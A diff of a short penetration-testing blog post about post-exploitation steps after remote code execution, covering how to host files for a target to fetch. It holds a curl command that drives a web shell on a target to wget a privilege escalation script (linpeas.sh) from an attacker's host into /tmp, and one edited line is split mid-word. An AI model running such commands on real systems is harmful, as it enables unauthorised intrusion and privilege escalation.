Bad-Jubies/bad-jubies.github.io/_posts/2020-9-17-RCE-NOW-WHAT.md

 python3 -m http.server <port>
 ```

 There's also a great tool called [updog](https://github.com/sc0tfree/updog) that adds more functionality to the SimpleHTTPServer module.
-Updog allows you to use SSL encryption and basic http authentication on your file server.
+Updog allows you to use SSL encryption and basic http authentication on y

+file server.
 ```sh
 updog -d <directory> -p <port>
 ```

 Downloading files on Linux is typically simple with `wget`.
-So copying our privilege escalation script to the `/tmp` directory would look like this:
+So copying a privilege escalation script to the `/tmp` directory would look like this:
 ```sh
 curl "http://192.168.142.133/cmd.php" --data-urlencode "cmd=wget http://192.168.142.132/linpeas.sh /tmp/linpeas.sh"
 ```